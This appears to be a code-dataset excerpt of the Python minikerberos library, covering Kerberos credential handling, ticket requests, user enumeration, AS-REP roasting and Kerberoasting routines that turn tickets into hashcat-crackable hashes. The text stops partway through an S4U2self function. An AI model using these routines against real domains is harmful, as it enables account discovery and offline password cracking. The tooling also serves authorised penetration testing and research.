cred.kerberos_key_rc4 = secret
elif st == KerberosSecretType.AES:
cred.kerberos_key_aes_256 = secret
cred.kerberos_key_aes_128 = secret
elif st == KerberosSecretType.DES:
cred.kerberos_key_des = secret
elif st == KerberosSecretType.DES3 or st == KerberosSecretType.TDES:
cred.kerberos_key_des3 = secret
elif st == KerberosSecretType.CCACHE:
cred.ccache = CCACHE.from_file(secret)
return cred
def __str__(self):
t = '===KerberosCredential===\r\n'
t += 'username: %s\r\n' % self.username
t += 'domain: %s\r\n' % self.domain
t += 'password: %s\r\n' % self.password
t += 'nt_hash: %s\r\n' % self.nt_hash
t += 'lm_hash: %s\r\n' % self.lm_hash
if self.kerberos_key_aes_256:
t += 'kerberos_key_aes_256: %s\r\n' % self.kerberos_key_aes_256
if self.kerberos_key_aes_128:
t += 'kerberos_key_aes_128: %s\r\n' % self.kerberos_key_aes_128
if self.kerberos_key_des:
t += 'kerberos_key_des: %s\r\n' % self.kerberos_key_des
if self.kerberos_key_rc4:
t += 'kerberos_key_rc4: %s\r\n' % self.kerberos_key_rc4
if self.kerberos_key_des3:
t += 'kerberos_key_des3: %s\r\n' % self.kerberos_key_des3
return t
|
skelsec/minikerberos | minikerberos/common.py | KerberosCredential.from_connection_string | python | def from_connection_string(s):
cred = KerberosCredential()
cred.domain, t = s.split('/', 1)
cred.username, t = t.split('/', 1)
secret_type, t = t.split(':', 1)
secret, target = t.rsplit('@', 1)
st = KerberosSecretType(secret_type.upper())
if st == KerberosSecretType.PASSWORD or st == KerberosSecretType.PW or st == KerberosSecretType.PASS:
cred.password = secret
elif st == KerberosSecretType.NT or st == KerberosSecretType.RC4:
cred.nt_hash = secret
cred.kerberos_key_rc4 = secret
elif st == KerberosSecretType.AES:
cred.kerberos_key_aes_256 = secret
cred.kerberos_key_aes_128 = secret
elif st == KerberosSecretType.DES:
cred.kerberos_key_des = secret
elif st == KerberosSecretType.DES3 or st == KerberosSecretType.TDES:
cred.kerberos_key_des3 = secret
elif st == KerberosSecretType.CCACHE:
cred.ccache = CCACHE.from_file(secret)
return cred | Credential input format:
<domain>/<username>/<secret_type>:<secret>@<dc_ip_or_hostname> | train | https://github.com/skelsec/minikerberos/blob/caf14c1d0132119d6e8a8f05120efb7d0824b2c6/minikerberos/common.py#L174-L208 | null | class KerberosCredential:
def __init__(self):
self.username = None
self.domain = None
self.password = None
self.nt_hash = None
self.lm_hash = None
self.kerberos_key_aes_256 = None
self.kerberos_key_aes_128 = None
self.kerberos_key_des = None
self.kerberos_key_rc4 = None
self.kerberos_key_des3 = None
self.ccache = None
def get_preferred_enctype(self, server_enctypes):
client_enctypes = self.get_supported_enctypes(as_int=False)
common_enctypes = list(set([s_enctype for s_enctype in server_enctypes]) & set(client_enctypes))
for c_enctype in client_enctypes:
if c_enctype in common_enctypes:
return c_enctype
raise Exception('No common supported enctypes! Server: %s Client: %s' % (
', '.join([s_enctype.name for s_enctype in server_enctypes]),
', '.join([c_enctype.name for c_enctype in client_enctypes])
)
)
def get_key_for_enctype(self, etype):
"""
Returns the encryption key bytes for the enctryption type.
"""
if etype == EncryptionType.AES256_CTS_HMAC_SHA1_96:
if self.kerberos_key_aes_256:
return bytes.fromhex(self.kerberos_key_aes_256)
if self.password is not None:
salt = (self.domain.upper() + self.username).encode()
return string_to_key(Enctype.AES256, self.password.encode(), salt).contents
raise Exception('There is no key for AES256 encryption')
elif etype == EncryptionType.AES128_CTS_HMAC_SHA1_96:
if self.kerberos_key_aes_128:
return bytes.fromhex(self.kerberos_key_aes_128)
if self.password is not None:
salt = (self.domain.upper() + self.username).encode()
return string_to_key(Enctype.AES128, self.password.encode(), salt).contents
raise Exception('There is no key for AES128 encryption')
elif etype == EncryptionType.ARCFOUR_HMAC_MD5:
if self.kerberos_key_rc4:
return bytes.fromhex(self.kerberos_key_rc4)
if self.nt_hash:
return bytes.fromhex(self.nt_hash)
elif self.password:
self.nt_hash = hashlib.new('md4', self.password.encode('utf-16-le')).hexdigest().upper()
return bytes.fromhex(self.nt_hash)
else:
raise Exception('There is no key for RC4 encryption')
elif etype == EncryptionType.DES3_CBC_SHA1:
if self.kerberos_key_des3:
return bytes.fromhex(self.kerberos_key_des)
elif self.password:
salt = (self.domain.upper() + self.username).encode()
return string_to_key(Enctype.DES3, self.password.encode(), salt).contents
else:
raise Exception('There is no key for DES3 encryption')
elif etype == EncryptionType.DES_CBC_MD5: #etype == EncryptionType.DES_CBC_CRC or etype == EncryptionType.DES_CBC_MD4 or
if self.kerberos_key_des:
return bytes.fromhex(self.kerberos_key_des)
elif self.password:
salt = (self.domain.upper() + self.username).encode()
return string_to_key(Enctype.DES_MD5, self.password.encode(), salt).contents
else:
raise Exception('There is no key for DES3 encryption')
else:
raise Exception('Unsupported encryption type: %s' % etype.name)
def get_supported_enctypes(self, as_int = True):
supp_enctypes = collections.OrderedDict()
if self.kerberos_key_aes_256:
supp_enctypes[EncryptionType.AES256_CTS_HMAC_SHA1_96] = 1
if self.kerberos_key_aes_128:
supp_enctypes[EncryptionType.AES128_CTS_HMAC_SHA1_96] = 1
if self.password:
supp_enctypes[EncryptionType.DES_CBC_CRC] = 1
supp_enctypes[EncryptionType.DES_CBC_MD4] = 1
supp_enctypes[EncryptionType.DES_CBC_MD5] = 1
supp_enctypes[EncryptionType.DES3_CBC_SHA1] = 1
supp_enctypes[EncryptionType.ARCFOUR_HMAC_MD5] = 1
supp_enctypes[EncryptionType.AES256_CTS_HMAC_SHA1_96] = 1
supp_enctypes[EncryptionType.AES128_CTS_HMAC_SHA1_96] = 1
if self.password or self.nt_hash or self.kerberos_key_rc4:
supp_enctypes[EncryptionType.ARCFOUR_HMAC_MD5] = 1
if self.kerberos_key_des:
supp_enctypes[EncryptionType.DES3_CBC_SHA1] = 1
if as_int == True:
return [etype.value for etype in supp_enctypes]
return [etype for etype in supp_enctypes]
@staticmethod
def add_args(parser):
group = parser.add_argument_group('authentication')
group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
group.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)')
group.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file '
'(KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use'
' the ones specified in the command line')
group.add_argument('-aesKey', action="store", metavar = "hex key", help='AES key to use for Kerberos Authentication'
' (128 or 256 bits)')
@staticmethod
def from_args(args):
cred = KerberosCredential()
cred.from_target_string(args.target)
if args.hashes is not None:
cred.lm_hash, cred.nt_hash = args.hashes.split(':')
if args.aesKey is not None:
try:
bytes.fromhex(args.aesKey)
except Exception as e:
logging.exception('Kerberos AES key format incorrect!')
t = len(args.aesKey)
if t == 64:
cred.kerberos_key_aes_256 = args.aesKey.lower()
elif t == 32:
cred.kerberos_key_aes_128 = args.aesKey.lower()
else:
raise Exception('Kerberos AES key length incorrect!')
if args.k is True:
if cred.has_kerberos_secret() == False:
raise Exception('Trying to perform Kerberos authentication with no usable kerberos secrets!')
cred.force_kerberos = True
if args.no_pass == False and cred.has_secret() == False:
cred.password = getpass.getpass()
return cred
@staticmethod
def from_connection_string(s):
"""
Credential input format:
<domain>/<username>/<secret_type>:<secret>@<dc_ip_or_hostname>
"""
cred = KerberosCredential()
cred.domain, t = s.split('/', 1)
cred.username, t = t.split('/', 1)
secret_type, t = t.split(':', 1)
secret, target = t.rsplit('@', 1)
st = KerberosSecretType(secret_type.upper())
if st == KerberosSecretType.PASSWORD or st == KerberosSecretType.PW or st == KerberosSecretType.PASS:
cred.password = secret
elif st == KerberosSecretType.NT or st == KerberosSecretType.RC4:
cred.nt_hash = secret
cred.kerberos_key_rc4 = secret
elif st == KerberosSecretType.AES:
cred.kerberos_key_aes_256 = secret
cred.kerberos_key_aes_128 = secret
elif st == KerberosSecretType.DES:
cred.kerberos_key_des = secret
elif st == KerberosSecretType.DES3 or st == KerberosSecretType.TDES:
cred.kerberos_key_des3 = secret
elif st == KerberosSecretType.CCACHE:
cred.ccache = CCACHE.from_file(secret)
return cred
def __str__(self):
t = '===KerberosCredential===\r\n'
t += 'username: %s\r\n' % self.username
t += 'domain: %s\r\n' % self.domain
t += 'password: %s\r\n' % self.password
t += 'nt_hash: %s\r\n' % self.nt_hash
t += 'lm_hash: %s\r\n' % self.lm_hash
if self.kerberos_key_aes_256:
t += 'kerberos_key_aes_256: %s\r\n' % self.kerberos_key_aes_256
if self.kerberos_key_aes_128:
t += 'kerberos_key_aes_128: %s\r\n' % self.kerberos_key_aes_128
if self.kerberos_key_des:
t += 'kerberos_key_des: %s\r\n' % self.kerberos_key_des
if self.kerberos_key_rc4:
t += 'kerberos_key_rc4: %s\r\n' % self.kerberos_key_rc4
if self.kerberos_key_des3:
t += 'kerberos_key_des3: %s\r\n' % self.kerberos_key_des3
return t
|
skelsec/minikerberos | minikerberos/security.py | KerberosUserEnum.run | python | def run(self, realm, users):
existing_users = []
for user in users:
logging.debug('Probing user %s' % user)
req = KerberosUserEnum.construct_tgt_req(realm, user)
rep = self.ksoc.sendrecv(req.dump(), throw = False)
if rep.name != 'KRB_ERROR':
# user doesnt need preauth, but it exists
existing_users.append(user)
elif rep.native['error-code'] != KerberosErrorCode.KDC_ERR_PREAUTH_REQUIRED.value:
# any other error means user doesnt exist
continue
else:
# preauth needed, only if user exists
existing_users.append(user)
return existing_users | Requests a TGT in the name of the users specified in users.
Returns a list of usernames that are in the domain.
realm: kerberos realm (domain name of the corp)
users: list : list of usernames to test | train | https://github.com/skelsec/minikerberos/blob/caf14c1d0132119d6e8a8f05120efb7d0824b2c6/minikerberos/security.py#L43-L69 | [
"def construct_tgt_req(realm, username):\n\tnow = datetime.datetime.utcnow()\n\tkdc_req_body = {}\n\tkdc_req_body['kdc-options'] = KDCOptions(set(['forwardable','renewable','proxiable']))\n\tkdc_req_body['cname'] = PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': [username]})\n\tkdc_req_body['r... | class KerberosUserEnum:
def __init__(self, ksoc):
self.ksoc = ksoc
def construct_tgt_req(realm, username):
now = datetime.datetime.utcnow()
kdc_req_body = {}
kdc_req_body['kdc-options'] = KDCOptions(set(['forwardable','renewable','proxiable']))
kdc_req_body['cname'] = PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': [username]})
kdc_req_body['realm'] = realm.upper()
kdc_req_body['sname'] = PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': ['krbtgt', realm.upper()]})
kdc_req_body['till'] = now + datetime.timedelta(days=1)
kdc_req_body['rtime'] = now + datetime.timedelta(days=1)
kdc_req_body['nonce'] = secrets.randbits(31)
kdc_req_body['etype'] = [2, 3, 16, 23, 17, 18] #we "support" all MS related enctypes
pa_data_1 = {}
pa_data_1['padata-type'] = int(PADATA_TYPE('PA-PAC-REQUEST'))
pa_data_1['padata-value'] = PA_PAC_REQUEST({'include-pac': True}).dump()
kdc_req = {}
kdc_req['pvno'] = krb5_pvno
kdc_req['msg-type'] = MESSAGE_TYPE.KRB_AS_REQ.value
kdc_req['padata'] = [pa_data_1]
kdc_req['req-body'] = KDC_REQ_BODY(kdc_req_body)
return AS_REQ(kdc_req)
def run(self, realm, users):
"""
Requests a TGT in the name of the users specified in users.
Returns a list of usernames that are in the domain.
realm: kerberos realm (domain name of the corp)
users: list : list of usernames to test
"""
existing_users = []
for user in users:
logging.debug('Probing user %s' % user)
req = KerberosUserEnum.construct_tgt_req(realm, user)
rep = self.ksoc.sendrecv(req.dump(), throw = False)
if rep.name != 'KRB_ERROR':
# user doesnt need preauth, but it exists
existing_users.append(user)
elif rep.native['error-code'] != KerberosErrorCode.KDC_ERR_PREAUTH_REQUIRED.value:
# any other error means user doesnt exist
continue
else:
# preauth needed, only if user exists
existing_users.append(user)
return existing_users
|
skelsec/minikerberos | minikerberos/security.py | APREPRoast.run | python | def run(self, creds, override_etype = [23]):
"""
Requests TGT tickets for all users specified in the targets list
creds: list : the users to request the TGT tickets for
override_etype: list : list of supported encryption types
"""
tgts = []
for cred in creds:
try:
kcomm = KerbrosComm(cred, self.ksoc)
kcomm.get_TGT(override_etype = override_etype, decrypt_tgt = False)
tgts.append(kcomm.kerberos_TGT)
except Exception as e:
logger.debug('Error while roasting client %s/%s Reason: %s' % (cred.domain, cred.username, str(e)))
continue
results = []
for tgt in tgts:
results.append(TGTTicket2hashcat(tgt))
return results | Requests TGT tickets for all users specified in the targets list
creds: list : the users to request the TGT tickets for
override_etype: list : list of supported encryption types | train | https://github.com/skelsec/minikerberos/blob/caf14c1d0132119d6e8a8f05120efb7d0824b2c6/minikerberos/security.py#L75-L96 | [
"def get_TGT(self, override_etype = None, decrypt_tgt = True):\n\t\"\"\"\n\tdecrypt_tgt: used for asreproast attacks\n\tSteps performed:\n\t\t1. Send and empty (no encrypted timestamp) AS_REQ with all the encryption types we support\n\t\t2. Depending on the response (either error or AS_REP with TGT) we either send ... | class APREPRoast:
def __init__(self, ksoc):
self.ksoc = ksoc
|
skelsec/minikerberos | minikerberos/security.py | Kerberoast.run | python | def run(self, targets, override_etype = [2, 3, 16, 23, 17, 18]):
if not self.kcomm:
try:
self.kcomm = KerbrosComm(self.ccred, self.ksoc)
self.kcomm.get_TGT()
except Exception as e:
logger.exception('Failed to get TGT ticket! Reason: %s' % str(e))
tgss = []
for target in targets:
try:
tgs, encTGSRepPart, key = self.kcomm.get_TGS(target, override_etype = override_etype)
tgss.append(tgs)
except Exception as e:
logger.debug('Failed to get TGS ticket for user %s/%s/%s! Reason: %s' % (target.domain, str(target.service), target.username, str(e)))
continue
results = []
for tgs in tgss:
results.append(TGSTicket2hashcat(tgs))
return results | Requests TGS tickets for all service users specified in the targets list
targets: list : the SPN users to request the TGS tickets for
allhash: bool : Return all enctype tickets, ot just 23 | train | https://github.com/skelsec/minikerberos/blob/caf14c1d0132119d6e8a8f05120efb7d0824b2c6/minikerberos/security.py#L104-L132 | [
"def TGSTicket2hashcat(res):\t\t\n\ttgs_encryption_type = int(res['ticket']['enc-part']['etype'])\n\ttgs_name_string = res['ticket']['sname']['name-string'][0]\n\ttgs_realm = res['ticket']['realm']\n\ttgs_checksum = res['ticket']['enc-part']['cipher'][:16]\n\ttgs_encrypted_data2 ... | class Kerberoast:
def __init__(self, ccred, ksoc, kcomm = None):
self.ccred = ccred
self.ksoc = ksoc
self.kcomm = kcomm
def run(self, targets, override_etype = [2, 3, 16, 23, 17, 18]):
"""
Requests TGS tickets for all service users specified in the targets list
targets: list : the SPN users to request the TGS tickets for
allhash: bool : Return all enctype tickets, ot just 23
"""
if not self.kcomm:
try:
self.kcomm = KerbrosComm(self.ccred, self.ksoc)
self.kcomm.get_TGT()
except Exception as e:
logger.exception('Failed to get TGT ticket! Reason: %s' % str(e))
tgss = []
for target in targets:
try:
tgs, encTGSRepPart, key = self.kcomm.get_TGS(target, override_etype = override_etype)
tgss.append(tgs)
except Exception as e:
logger.debug('Failed to get TGS ticket for user %s/%s/%s! Reason: %s' % (target.domain, str(target.service), target.username, str(e)))
continue
results = []
for tgs in tgss:
results.append(TGSTicket2hashcat(tgs))
return results
|
skelsec/minikerberos | minikerberos/crypto/PBKDF2/pbkdf2.py | pbkdf2 | python | def pbkdf2(password, salt, iters, keylen, digestmod = hashlib.sha1):
h = hmac.new(password, digestmod=digestmod)
def prf(data):
hm = h.copy()
hm.update(data)
return bytearray(hm.digest())
key = bytearray()
i = 1
while len(key) < keylen:
T = U = prf(salt + struct.pack('>i', i))
for _ in range(iters - 1):
U = prf(U)
T = bytearray(x ^ y for x, y in zip(T, U))
key += T
i += 1
return key[:keylen] | Run the PBKDF2 (Password-Based Key Derivation Function 2) algorithm
and return the derived key. The arguments are:
password (bytes or bytearray) -- the input password
salt (bytes or bytearray) -- a cryptographic salt
iters (int) -- number of iterations
keylen (int) -- length of key to derive
digestmod -- a cryptographic hash function: either a module
supporting PEP 247, a hashlib constructor, or (in Python 3.4
or later) the name of a hash function.
For example:
>>> import hashlib
>>> from binascii import hexlify, unhexlify
>>> password = b'Squeamish Ossifrage'
>>> salt = unhexlify(b'1234567878563412')
>>> hexlify(pbkdf2(password, salt, 500, 16, hashlib.sha1))
b'9e8f1072bdf5ef042bd988c7da83e43b' | train | https://github.com/skelsec/minikerberos/blob/caf14c1d0132119d6e8a8f05120efb7d0824b2c6/minikerberos/crypto/PBKDF2/pbkdf2.py#L7-L45 | [
"def prf(data):\n\thm = h.copy()\n\thm.update(data)\n\treturn bytearray(hm.digest())\n"
] |
#https://codereview.stackexchange.com/questions/87538/python-pbkdf2-using-core-modules
import hmac
import struct
import hashlib
|
skelsec/minikerberos | minikerberos/communication.py | KerberosSocket.from_connection_string | python | def from_connection_string(s, soc_type = KerberosSocketType.TCP):
ip = None
port = 88
t, addr = s.rsplit('@')
if addr.find(':') == -1:
ip = addr
else:
ip, port = addr.split(':')
return KerberosSocket(ip, port = int(port), soc_type = soc_type) | <credentials>@<ip_or_hostname>:<port> | train | https://github.com/skelsec/minikerberos/blob/caf14c1d0132119d6e8a8f05120efb7d0824b2c6/minikerberos/communication.py#L42-L55 | null | class KerberosSocket:
def __init__(self, ip, port = 88, soc_type = KerberosSocketType.TCP):
self.soc_type = soc_type
self.dst_ip = ip
self.dst_port = int(port)
self.soc = None
def __str__(self):
t = '===KerberosSocket===\r\n'
t += 'soc_type: %s\r\n' % self.soc_type
t += 'dst_ip: %s\r\n' % self.dst_ip
t += 'dst_port: %s\r\n' % self.dst_port
return t
@staticmethod
def from_connection_string(s, soc_type = KerberosSocketType.TCP):
"""
<credentials>@<ip_or_hostname>:<port>
"""
ip = None
port = 88
t, addr = s.rsplit('@')
if addr.find(':') == -1:
ip = addr
else:
ip, port = addr.split(':')
return KerberosSocket(ip, port = int(port), soc_type = soc_type)
def get_addr_str(self):
return '%s:%d' % (self.dst_ip, self.dst_port)
def create_soc(self):
if self.soc_type == KerberosSocketType.TCP:
self.soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.soc.connect((self.dst_ip, self.dst_port))
elif self.soc_type == KerberosSocketType.UDP:
self.soc = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
else:
raise Exception('Unknown socket type!')
def sendrecv(self, data, throw = True):
self.create_soc()
try:
if self.soc_type == KerberosSocketType.TCP:
length = len(data).to_bytes(4, byteorder = 'big', signed = False)
self.soc.sendall(length + data)
buff = b''
total_length = -1
while True:
temp = b''
temp = self.soc.recv(4096)
if temp == b'':
break
buff += temp
if total_length == -1:
if len(buff) > 4:
total_length = int.from_bytes(buff[:4], byteorder = 'big', signed = False)
if total_length == 0:
raise Exception('Returned data length is 0! This means the server did not understand our message')
if total_length != -1:
if len(buff) == total_length + 4:
buff = buff[4:]
break
elif len(buff) > total_length + 4:
raise Exception('Got too much data somehow')
else:
continue
elif self.soc_type == KerberosSocketType.UDP:
self.soc.sendto(data, (self.dst_ip, self.dst_port))
while True:
buff, addr = self.soc.recvfrom(65535)
if addr[0] == self.dst_ip:
break
else:
# got a message from a different IP than the target, strange!
# continuing, but this might result in an infinite loop
continue
krb_message = KerberosResponse.load(buff)
if krb_message.name == 'KRB_ERROR' and throw == True:
raise KerberosError(krb_message)
return krb_message
finally:
self.soc.close()
|
skelsec/minikerberos | minikerberos/communication.py | KerbrosComm.from_tgt | python | def from_tgt(ksoc, tgt, key):
kc = KerbrosComm(None, ksoc)
kc.kerberos_TGT = tgt
kc.kerberos_cipher_type = key['keytype']
kc.kerberos_session_key = Key(kc.kerberos_cipher_type, key['keyvalue'])
kc.kerberos_cipher = _enctype_table[kc.kerberos_cipher_type]
return kc | Sets up the kerberos object from tgt and the session key.
Use this function when pulling the TGT from ccache file. | train | https://github.com/skelsec/minikerberos/blob/caf14c1d0132119d6e8a8f05120efb7d0824b2c6/minikerberos/communication.py#L138-L149 | null | class KerbrosComm:
def __init__(self,ccred, ksoc, ccache = None):
self.usercreds = ccred
self.ksoc = ksoc
self.user_ccache = ccache
self.ccache = CCACHE()
self.kerberos_session_key = None
self.kerberos_TGT = None
self.kerberos_TGT_encpart = None
self.kerberos_TGS = None
self.kerberos_cipher = None
self.kerberos_cipher_type = None
self.kerberos_key = None
@staticmethod
def from_tgt(ksoc, tgt, key):
"""
Sets up the kerberos object from tgt and the session key.
Use this function when pulling the TGT from ccache file.
"""
kc = KerbrosComm(None, ksoc)
kc.kerberos_TGT = tgt
kc.kerberos_cipher_type = key['keytype']
kc.kerberos_session_key = Key(kc.kerberos_cipher_type, key['keyvalue'])
kc.kerberos_cipher = _enctype_table[kc.kerberos_cipher_type]
return kc
def do_preauth(self, rep):
#now getting server's supported encryption methods
supp_enc_methods = collections.OrderedDict()
for enc_method in METHOD_DATA.load(rep['e-data']).native:
data_type = PaDataType(enc_method['padata-type'])
if data_type == PaDataType.ETYPE_INFO or data_type == PaDataType.ETYPE_INFO2:
if data_type == PaDataType.ETYPE_INFO:
enc_info_list = ETYPE_INFO.load(enc_method['padata-value'])
elif data_type == PaDataType.ETYPE_INFO2:
enc_info_list = ETYPE_INFO2.load(enc_method['padata-value'])
for enc_info in enc_info_list.native:
supp_enc_methods[EncryptionType(enc_info['etype'])] = enc_info['salt']
logger.debug('Server supports encryption type %s with salt %s' % (EncryptionType(enc_info['etype']).name, enc_info['salt']))
logger.debug('Constructing TGT request with auth data')
#now to create an AS_REQ with encrypted timestamp for authentication
pa_data_1 = {}
pa_data_1['padata-type'] = int(PADATA_TYPE('PA-PAC-REQUEST'))
pa_data_1['padata-value'] = PA_PAC_REQUEST({'include-pac': True}).dump()
now = datetime.datetime.utcnow()
#creating timestamp asn1
timestamp = PA_ENC_TS_ENC({'patimestamp': now, 'pausec': now.microsecond}).dump()
supp_enc = self.usercreds.get_preferred_enctype(supp_enc_methods)
logger.debug('Selecting common encryption type: %s' % supp_enc.name)
self.kerberos_cipher = _enctype_table[supp_enc.value]
self.kerberos_cipher_type = supp_enc.value
self.kerberos_key = Key(self.kerberos_cipher.enctype, self.usercreds.get_key_for_enctype(supp_enc))
enc_timestamp = self.kerberos_cipher.encrypt(self.kerberos_key, 1, timestamp, None)
pa_data_2 = {}
pa_data_2['padata-type'] = int(PADATA_TYPE('ENC-TIMESTAMP'))
pa_data_2['padata-value'] = EncryptedData({'etype': supp_enc.value, 'cipher': enc_timestamp}).dump()
kdc_req_body = {}
kdc_req_body['kdc-options'] = KDCOptions(set(['forwardable','renewable','proxiable']))
kdc_req_body['cname'] = PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': [self.usercreds.username]})
kdc_req_body['realm'] = self.usercreds.domain.upper()
kdc_req_body['sname'] = PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': ['krbtgt', self.usercreds.domain.upper()]})
kdc_req_body['till'] = now + datetime.timedelta(days=1)
kdc_req_body['rtime'] = now + datetime.timedelta(days=1)
kdc_req_body['nonce'] = secrets.randbits(31)
kdc_req_body['etype'] = [supp_enc.value] #selecting according to server's preferences
kdc_req = {}
kdc_req['pvno'] = krb5_pvno
kdc_req['msg-type'] = MESSAGE_TYPE.KRB_AS_REQ.value
kdc_req['padata'] = [pa_data_2,pa_data_1]
kdc_req['req-body'] = KDC_REQ_BODY(kdc_req_body)
req = AS_REQ(kdc_req)
logger.debug('Sending TGT request to server')
return self.ksoc.sendrecv(req.dump())
def get_TGT(self, override_etype = None, decrypt_tgt = True):
"""
decrypt_tgt: used for asreproast attacks
Steps performed:
1. Send and empty (no encrypted timestamp) AS_REQ with all the encryption types we support
2. Depending on the response (either error or AS_REP with TGT) we either send another AS_REQ with the encrypted data or return the TGT (or fail miserably)
3. PROFIT
"""
logger.debug('Generating initial TGT without authentication data')
now = datetime.datetime.utcnow()
kdc_req_body = {}
kdc_req_body['kdc-options'] = KDCOptions(set(['forwardable','renewable','proxiable']))
kdc_req_body['cname'] = PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': [self.usercreds.username]})
kdc_req_body['realm'] = self.usercreds.domain.upper()
kdc_req_body['sname'] = PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': ['krbtgt', self.usercreds.domain.upper()]})
kdc_req_body['till'] = now + datetime.timedelta(days=1)
kdc_req_body['rtime'] = now + datetime.timedelta(days=1)
kdc_req_body['nonce'] = secrets.randbits(31)
if override_etype is None:
kdc_req_body['etype'] = self.usercreds.get_supported_enctypes()
else:
kdc_req_body['etype'] = override_etype
pa_data_1 = {}
pa_data_1['padata-type'] = int(PADATA_TYPE('PA-PAC-REQUEST'))
pa_data_1['padata-value'] = PA_PAC_REQUEST({'include-pac': True}).dump()
kdc_req = {}
kdc_req['pvno'] = krb5_pvno
kdc_req['msg-type'] = MESSAGE_TYPE.KRB_AS_REQ.value
kdc_req['padata'] = [pa_data_1]
kdc_req['req-body'] = KDC_REQ_BODY(kdc_req_body)
req = AS_REQ(kdc_req)
logger.debug('Sending initial TGT to %s' % self.ksoc.get_addr_str())
rep = self.ksoc.sendrecv(req.dump(), throw = False)
if rep.name != 'KRB_ERROR':
#user can do kerberos auth without preauthentication!
self.kerberos_TGT = rep.native
#if we want to roast the asrep (tgt rep) part then we dont even have the proper keys to decrypt
#so we just return, the asrep can be extracted from this object anyhow
if decrypt_tgt == False:
return
self.kerberos_cipher = _enctype_table[23]
self.kerberos_cipher_type = 23
self.kerberos_key = Key(self.kerberos_cipher.enctype, self.usercreds.get_key_for_enctype(EncryptionType.ARCFOUR_HMAC_MD5))
else:
if rep.native['error-code'] != KerberosErrorCode.KDC_ERR_PREAUTH_REQUIRED.value:
raise KerberosError(rep)
rep = rep.native
logger.debug('Got reply from server, asikg to provide auth data')
rep = self.do_preauth(rep)
logger.debug('Got valid TGT response from server')
rep = rep.native
self.kerberos_TGT = rep
cipherText = rep['enc-part']['cipher']
temp = self.kerberos_cipher.decrypt(self.kerberos_key, 3, cipherText)
self.kerberos_TGT_encpart = EncASRepPart.load(temp).native
self.kerberos_session_key = Key(self.kerberos_cipher.enctype, self.kerberos_TGT_encpart['key']['keyvalue'])
self.ccache.add_tgt(self.kerberos_TGT, self.kerberos_TGT_encpart, override_pp = True)
logger.debug('Got valid TGT')
return
def get_TGS(self, spn_user, override_etype = None):
"""
Requests a TGS ticket for the specified user.
Retruns the TGS ticket, end the decrpyted encTGSRepPart.
spn_user: KerberosTarget: the service user you want to get TGS for.
override_etype: None or list of etype values (int) Used mostly for kerberoasting, will override the AP_REQ supported etype values (which is derived from the TGT) to be able to recieve whatever tgs tiecket
"""
#construct tgs_req
logger.debug('Constructing TGS request for user %s' % spn_user.get_formatted_pname())
now = datetime.datetime.utcnow()
kdc_req_body = {}
kdc_req_body['kdc-options'] = KDCOptions(set(['forwardable','renewable','renewable_ok', 'canonicalize']))
kdc_req_body['realm'] = spn_user.domain.upper()
kdc_req_body['sname'] = PrincipalName({'name-type': NAME_TYPE.SRV_INST.value, 'name-string': spn_user.get_principalname()})
kdc_req_body['till'] = now + datetime.timedelta(days=1)
kdc_req_body['nonce'] = secrets.randbits(31)
if override_etype:
kdc_req_body['etype'] = override_etype
else:
kdc_req_body['etype'] = [self.kerberos_cipher_type]
authenticator_data = {}
authenticator_data['authenticator-vno'] = krb5_pvno
authenticator_data['crealm'] = Realm(self.kerberos_TGT['crealm'])
authenticator_data['cname'] = self.kerberos_TGT['cname']
authenticator_data['cusec'] = now.microsecond
authenticator_data['ctime'] = now
authenticator_data_enc = self.kerberos_cipher.encrypt(self.kerberos_session_key, 7, Authenticator(authenticator_data).dump(), None)
ap_req = {}
ap_req['pvno'] = krb5_pvno
ap_req['msg-type'] = MESSAGE_TYPE.KRB_AP_REQ.value
ap_req['ap-options'] = APOptions(set())
ap_req['ticket'] = Ticket(self.kerberos_TGT['ticket'])
ap_req['authenticator'] = EncryptedData({'etype': self.kerberos_cipher_type, 'cipher': authenticator_data_enc})
pa_data_1 = {}
pa_data_1['padata-type'] = PaDataType.TGS_REQ.value
pa_data_1['padata-value'] = AP_REQ(ap_req).dump()
kdc_req = {}
kdc_req['pvno'] = krb5_pvno
kdc_req['msg-type'] = MESSAGE_TYPE.KRB_TGS_REQ.value
kdc_req['padata'] = [pa_data_1]
kdc_req['req-body'] = KDC_REQ_BODY(kdc_req_body)
req = TGS_REQ(kdc_req)
logger.debug('Constructing TGS request to server')
rep = self.ksoc.sendrecv(req.dump())
logger.debug('Got TGS reply, decrypting...')
tgs = rep.native
encTGSRepPart = EncTGSRepPart.load(self.kerberos_cipher.decrypt(self.kerberos_session_key, 8, tgs['enc-part']['cipher'])).native
key = Key(encTGSRepPart['key']['keytype'], encTGSRepPart['key']['keyvalue'])
self.ccache.add_tgs(tgs, encTGSRepPart)
logger.debug('Got valid TGS reply')
self.kerberos_TGS = tgs
return tgs, encTGSRepPart, key
#https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-sfu/6a8dfc0c-2d32-478a-929f-5f9b1b18a169
def S4U2self(self, user_to_impersonate, supp_enc_methods = [EncryptionType.DES_CBC_CRC,EncryptionType.DES_CBC_MD4,EncryptionType.DES_CBC_MD5,EncryptionType.DES3_CBC_SHA1,EncryptionType.ARCFOUR_HMAC_MD5,EncryptionType.AES256_CTS_HMAC_SHA1_96,EncryptionType.AES128_CTS_HMAC_SHA1_96]):
#def S4U2self(self, user_to_impersonate, spn_user, supp_enc_methods = [EncryptionType.DES_CBC_CRC,EncryptionType.DES_CBC_MD4,EncryptionType.DES_CBC_MD5,EncryptionType.DES3_CBC_SHA1,EncryptionType.ARCFOUR_HMAC_MD5,EncryptionType.AES256_CTS_HMAC_SHA1_96,EncryptionType.AES128_CTS_HMAC_SHA1_96]):
"""
user_to_impersonate : KerberosTarget class
"""
if not self.kerberos_TGT:
